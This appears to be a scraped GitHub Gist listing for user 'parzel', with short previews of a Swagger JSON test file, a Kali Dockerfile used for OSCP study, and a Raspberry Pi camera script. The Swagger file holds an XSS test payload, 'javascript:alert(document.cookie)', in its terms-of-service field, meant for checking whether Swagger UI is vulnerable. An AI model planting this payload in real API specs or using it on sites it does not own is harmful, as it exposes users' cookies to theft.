parzel parzel
parzel
/ xss.json
Last active
June 19, 2020 20:47
This can be used to test for Swagger UI that is still vulnerable to a XSS attack (https://github.com/swagger-api/swagger-ui/issues/3847)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger": "2.0", | |
| "info": { | |
| "title": "Swagger Sample App", | |
| "description": "Please to click Terms of service", | |
| "termsOfService": "javascript:alert(document.cookie)", | |
| "version": "1.0.1" | |
| }, | |
| "basePath": "/v1", | |
| "schemes": [ |
parzel
/ Dockerfile
Created
October 26, 2019 16:12
Modified Kali Dockerfile that I used for OSCP. Read more about it here: https://parzelsec.de/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM kalilinux/kali-linux-docker | |
| LABEL MAINTAINER=parzelsec.de | |
| # general | |
| RUN apt-get update && apt-get install -y \ | |
| vim \ | |
| host \ | |
| git \ | |
| python3-pip \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 -u | |
| """ | |
| Record last n seconds of picamera in ring buffer and replay with vnc from correct position (all in memory) | |
| """ | |
| import picamera | |
| from time import sleep | |
| import sys | |
| import subprocess |